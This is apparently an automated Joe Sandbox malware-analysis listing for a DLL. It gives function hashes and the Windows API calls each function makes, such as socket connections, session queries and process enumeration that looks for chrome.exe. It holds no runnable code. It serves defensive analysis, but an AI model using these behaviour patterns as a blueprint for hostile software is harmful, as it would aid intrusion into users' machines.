                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: #536#537#800#922
                                                  • String ID:
                                                  • API String ID: 1475696894-0
                                                  • Opcode ID: 7d1a2c313bb10d832db081e31ac023a115b9d5a741b1015456ccb2ce16f95c01
                                                  • Instruction ID: 1cf16686c75a57ace72aecc56e9772a672cb7b67628aacae2db0a16f8193c9c6
                                                  • Opcode Fuzzy Hash: 7d1a2c313bb10d832db081e31ac023a115b9d5a741b1015456ccb2ce16f95c01
                                                  • Instruction Fuzzy Hash: 2301B5B6204650AFC304DF58DD01F9AF7E4FB88B14F408A2DF98997781C779A904CB92
                                                  APIs
                                                  • socket.WS2_32(00000002,00000001,00000000), ref: 1002CB6A
                                                  • htons.WS2_32 ref: 1002CB92
                                                  • connect.WS2_32(00000000,?,00000010), ref: 1002CBA5
                                                  • closesocket.WS2_32(00000000), ref: 1002CBB1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: closesocketconnecthtonssocket
                                                  • String ID:
                                                  • API String ID: 3817148366-0
                                                  • Opcode ID: eb37e080dc3f1f8ccbdf2bbb095a56ed3045b64092a9622a6cfcea14b4e0b0e5
                                                  • Instruction ID: e8f6fcb377fdd042e502e5b9bb1bca880f3579ad8180536aff2f54e253c3389a
                                                  • Opcode Fuzzy Hash: eb37e080dc3f1f8ccbdf2bbb095a56ed3045b64092a9622a6cfcea14b4e0b0e5
                                                  • Instruction Fuzzy Hash: E0F0F6385143306BE700EB7C9C8AADBB7E4FF84324F844B49F9A8822E1E27084045786
                                                  APIs
                                                  • WTSQuerySessionInformationA.WTSAPI32(00000000,000000FF,00000005,?,?), ref: 1002C33C
                                                  • #823.MFC42(00000100,75571760,00000000,000000FF,00000005,?,?), ref: 1002C34B
                                                  • lstrcpyA.KERNEL32(00000000,?,?), ref: 1002C35B
                                                  • WTSFreeMemory.WTSAPI32(?), ref: 1002C366
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: #823FreeInformationMemoryQuerySessionlstrcpy
                                                  • String ID:
                                                  • API String ID: 3008764780-0
                                                  • Opcode ID: 0d88bfbc678714cad99cd30844ed1c893ef2e85d3cf852497a73032b9528ba91
                                                  • Instruction ID: 0e0dc6ce2e22f62c944f194f199933a30fb1a1041a33420a8a3a97c55cf99f31
                                                  • Opcode Fuzzy Hash: 0d88bfbc678714cad99cd30844ed1c893ef2e85d3cf852497a73032b9528ba91
                                                  • Instruction Fuzzy Hash: F9F0A7B96083116BDB00DB78AC46D9B76E4EB84A11F444A2CF948D2280F574ED08C7F2
                                                  APIs
                                                  • Process32First.KERNEL32(?,00000128), ref: 1000B5B7
                                                  • Process32Next.KERNEL32(?,00000128), ref: 1000B5D5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process32$FirstNext
                                                  • String ID: ???
                                                  • API String ID: 1173892470-1053719742
                                                  • Opcode ID: 712854ab25addc2021797cccdb898ca77ef716bf3bd6518fcb4f01374f701812
                                                  • Instruction ID: f3f52207799e89cd2a562506939f2cbbbb926e58e4282d7ba594e292c06b3d7f
                                                  • Opcode Fuzzy Hash: 712854ab25addc2021797cccdb898ca77ef716bf3bd6518fcb4f01374f701812
                                                  • Instruction Fuzzy Hash: CE010432205A040BD728D9399C419AFB7D6EFC43A0F91462DF826C32C4DF78DE08C691
                                                  APIs
                                                  • #537.MFC42(chrome.exe), ref: 1000D897
                                                    • Part of subcall function 1000BBB0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 1000BBDA
                                                    • Part of subcall function 1000BBB0: Process32First.KERNEL32(00000000), ref: 1000BBEF
                                                    • Part of subcall function 1000BBB0: #4202.MFC42(00000000), ref: 1000BC03
                                                    • Part of subcall function 1000BBB0: Process32Next.KERNEL32(00000000,00000000), ref: 1000BC0E
                                                    • Part of subcall function 1000BBB0: #537.MFC42(?,00000000,00000000,00000000), ref: 1000BC24
                                                    • Part of subcall function 1000BBB0: #4202.MFC42 ref: 1000BC35
                                                    • Part of subcall function 1000BBB0: #5572.MFC42(000000FF), ref: 1000BC78
                                                    • Part of subcall function 1000BBB0: #800.MFC42(000000FF), ref: 1000BC88
                                                    • Part of subcall function 1000BBB0: Process32Next.KERNEL32(00000000,00000000), ref: 1000BC93
                                                    • Part of subcall function 1000BBB0: #5572.MFC42(000000FF,00000000,00000000,00000000), ref: 1000BCA9
                                                    • Part of subcall function 1000BBB0: #800.MFC42 ref: 1000BCC0
                                                  • Sleep.KERNEL32(000003E8), ref: 1000D8A9
                                                    • Part of subcall function 100048B0: WSAStartup.WS2_32(00000202,?), ref: 1000491D
                                                    • Part of subcall function 100048B0: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 1000492B
                                                    • Part of subcall function 10004A60: ResetEvent.KERNEL32(?,?,00000000), ref: 10004A73
                                                    • Part of subcall function 10004A60: socket.WS2_32 ref: 10004A86
                                                    • Part of subcall function 100049A0: WaitForSingleObject.KERNEL32(?,000000FF,00000000,00000000,?,00000000,10097CDC,000000FF,1001DDF6), ref: 100049DC
                                                    • Part of subcall function 100049A0: CloseHandle.KERNEL32(?), ref: 100049FF
                                                    • Part of subcall function 100049A0: CloseHandle.KERNEL32(?), ref: 10004A08
                                                    • Part of subcall function 100049A0: WSACleanup.WS2_32 ref: 10004A0A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process32$#4202#537#5572#800CloseCreateEventHandleNext$CleanupFirstObjectResetSingleSleepSnapshotStartupToolhelp32Waitsocket
                                                  • String ID: chrome.exe
                                                  • API String ID: 294463573-2619149582
                                                  • Opcode ID: 8a2962456d4226b2b37f09fce1ff47a6c87198594a43253825bd3ca5275863b7
                                                  • Instruction ID: 937db72c451f7d7298a7d72ee82d98ab827ef43f1333ab97fdd24501930b49d6
                                                  • Opcode Fuzzy Hash: 8a2962456d4226b2b37f09fce1ff47a6c87198594a43253825bd3ca5275863b7
                                                  • Instruction Fuzzy Hash: 4E117FB80086C19FE324DB64D951BDFB7E0EB95750F404A2DE8A9432C1DF342604CBA3
                                                  APIs
                                                  • #537.MFC42(chrome.exe), ref: 1000D997
                                                    • Part of subcall function 1000BBB0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 1000BBDA
                                                    • Part of subcall function 1000BBB0: Process32First.KERNEL32(00000000), ref: 1000BBEF
                                                    • Part of subcall function 1000BBB0: #4202.MFC42(00000000), ref: 1000BC03
                                                    • Part of subcall function 1000BBB0: Process32Next.KERNEL32(00000000,00000000), ref: 1000BC0E
                                                    • Part of subcall function 1000BBB0: #537.MFC42(?,00000000,00000000,00000000), ref: 1000BC24
                                                    • Part of subcall function 1000BBB0: #4202.MFC42 ref: 1000BC35
                                                    • Part of subcall function 1000BBB0: #5572.MFC42(000000FF), ref: 1000BC78
                                                    • Part of subcall function 1000BBB0: #800.MFC42(000000FF), ref: 1000BC88
                                                    • Part of subcall function 1000BBB0: Process32Next.KERNEL32(00000000,00000000), ref: 1000BC93
                                                    • Part of subcall function 1000BBB0: #5572.MFC42(000000FF,00000000,00000000,00000000), ref: 1000BCA9
                                                    • Part of subcall function 1000BBB0: #800.MFC42 ref: 1000BCC0
                                                  • Sleep.KERNEL32(000003E8), ref: 1000D9A9
                                                    • Part of subcall function 100048B0: WSAStartup.WS2_32(00000202,?), ref: 1000491D
                                                    • Part of subcall function 100048B0: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 1000492B
                                                    • Part of subcall function 10004A60: ResetEvent.KERNEL32(?,?,00000000), ref: 10004A73
                                                    • Part of subcall function 10004A60: socket.WS2_32 ref: 10004A86
                                                    • Part of subcall function 100049A0: WaitForSingleObject.KERNEL32(?,000000FF,00000000,00000000,?,00000000,10097CDC,000000FF,1001DDF6), ref: 100049DC
                                                    • Part of subcall function 100049A0: CloseHandle.KERNEL32(?), ref: 100049FF
                                                    • Part of subcall function 100049A0: CloseHandle.KERNEL32(?), ref: 10004A08
                                                    • Part of subcall function 100049A0: WSACleanup.WS2_32 ref: 10004A0A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process32$#4202#537#5572#800CloseCreateEventHandleNext$CleanupFirstObjectResetSingleSleepSnapshotStartupToolhelp32Waitsocket
                                                  • String ID: chrome.exe
                                                  • API String ID: 294463573-2619149582
                                                  • Opcode ID: 1a36ca56097d4157cbc565df20af2378335b0440f818cd579cbdade357011e65
                                                  • Instruction ID: 7d00cbbaefd424bab256b053e7334cbca6cae7e0cf794a66506b1b3d32c14fa1
                                                  • Opcode Fuzzy Hash: 1a36ca56097d4157cbc565df20af2378335b0440f818cd579cbdade357011e65
                                                  • Instruction Fuzzy Hash: EE117F781086C09BE324DB64DA51BDFB7E0EB95750F404A2DE8A9432C1DF382504CBA3
                                                  APIs
                                                    • Part of subcall function 1002CDD0: Sleep.KERNEL32(00000064,?,?), ref: 1002CDE1
                                                    • Part of subcall function 1002CDD0: wsprintfA.USER32 ref: 1002CE0C
                                                    • Part of subcall function 1002CDD0: closesocket.WS2_32(00000000), ref: 1002CE24
                                                    • Part of subcall function 1002CDD0: TerminateThread.KERNEL32(?,00000000), ref: 1002CE5C
                                                    • Part of subcall function 1002CDD0: CloseHandle.KERNEL32(1012E1C4), ref: 1002CE63
                                                  • gethostbyname.WS2_32(1012B918), ref: 10024678
                                                  • inet_ntoa.WS2_32(?), ref: 1002469B
                                                    • Part of subcall function 1002CC90: _snprintf.MSVCRT ref: 1002CCCF
                                                    • Part of subcall function 1002CC90: recv.WS2_32(00000000,?,00000002,00000000), ref: 1002CD31
                                                    • Part of subcall function 1002CC90: CreateThread.KERNEL32(00000000,00000000,1002CBF0,?,00000000,?), ref: 1002CD80
                                                    • Part of subcall function 1002CC90: CloseHandle.KERNEL32(00000000), ref: 1002CD94
                                                    • Part of subcall function 1002CC90: closesocket.WS2_32(00000000), ref: 1002CDB1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseHandleThreadclosesocket$CreateSleepTerminate_snprintfgethostbynameinet_ntoarecvwsprintf
                                                  • String ID: 127.0.0.1
                                                  • API String ID: 4129115345-3619153832
                                                  • Opcode ID: c64b287c9701a872d1ce02b35808dddf6b5cfb117866dcaa8d1298daaccfc035
                                                  • Instruction ID: dfc37fb64dee02c743c361079aff155d5755dd21fe0fbfcf436a641e6dd946ac
                                                  • Opcode Fuzzy Hash: c64b287c9701a872d1ce02b35808dddf6b5cfb117866dcaa8d1298daaccfc035
                                                  • Instruction Fuzzy Hash: A7E06D7A2106009BC204DBA8EC80DEB77E5FBDC710B04852DF94AD7211C6307841D7A0
                                                  APIs
                                                  • EnterCriticalSection.KERNEL32(?,00000000,?,?,?,10004E03,?,00000003,00000003,00000000,?,10004C8B,?,00000000,?), ref: 10001C8E
                                                  • LeaveCriticalSection.KERNEL32(?,?,?,?,10004E03,?,00000003,00000003,00000000,?,10004C8B,?,00000000,?), ref: 10001CA4
                                                  • memmove.MSVCRT(?,?,00000000,?,?,?,?,10004E03,?,00000003,00000003,00000000,?,10004C8B,?,00000000), ref: 10001CF5
                                                  • LeaveCriticalSection.KERNEL32(?,00000000,?,?,?,10004E03,?,00000003,00000003,00000000,?,10004C8B,?,00000000,?), ref: 10001D1B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CriticalSection$Leave$Entermemmove
                                                  • String ID:
                                                  • API String ID: 72348100-0
                                                  • Opcode ID: b2c8c82c961791ae8f53fef40cbf23f5f2d1006caee183a225647bbe481849f1
                                                  • Instruction ID: 50b30369da4871338d3e5076dbae6429fca2f6132d25b88ab6d76ff2db9ab769
                                                  • Opcode Fuzzy Hash: b2c8c82c961791ae8f53fef40cbf23f5f2d1006caee183a225647bbe481849f1
                                                  • Instruction Fuzzy Hash: AE11BF3A3042154FAB08EF749C858EFB799FF94290704452EF907CB346DB71ED0886A0
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CharNext$free$AttributesCreateDirectoryErrorFileLastlstrcpylstrlenmalloc
                                                  • String ID:
                                                  • API String ID: 3289936468-0
                                                  • Opcode ID: 242f31426ad57f69496cf5a359c15a3d78e904203da98ddbbe90ee3972058db7
                                                  • Instruction ID: e5bcf6fcaf6474cf11c06b2f5d739369e89de0018cd217908e7742b1c919ccc1
                                                  • Opcode Fuzzy Hash: 242f31426ad57f69496cf5a359c15a3d78e904203da98ddbbe90ee3972058db7
                                                  • Instruction Fuzzy Hash: DB0180B5C04665AFE711DF188C44BEABFE8FB0AAA0F040656E995A3645C7345E028BE1
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000000,?,?), ref: 100069C0
                                                  • HeapReAlloc.KERNEL32(00000000), ref: 100069C7
                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 100069D5
                                                  • HeapAlloc.KERNEL32(00000000), ref: 100069DC
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$AllocProcess
                                                  • String ID:
                                                  • API String ID: 1617791916-0
                                                  • Opcode ID: 8467137ebeee5c80095378d21e104a4eec5c859026c898dd95d044c84a894ab9
                                                  • Instruction ID: 47877cb6062bd81062e19e0104322f8483190e017e00c23344b6b727d1ead73d
                                                  • Opcode Fuzzy Hash: 8467137ebeee5c80095378d21e104a4eec5c859026c898dd95d044c84a894ab9
                                                  • Instruction Fuzzy Hash: B6D04C75604212ABFE449BA8CD8DFAA7BADFB84745F058948F54DCA094C6709840DB31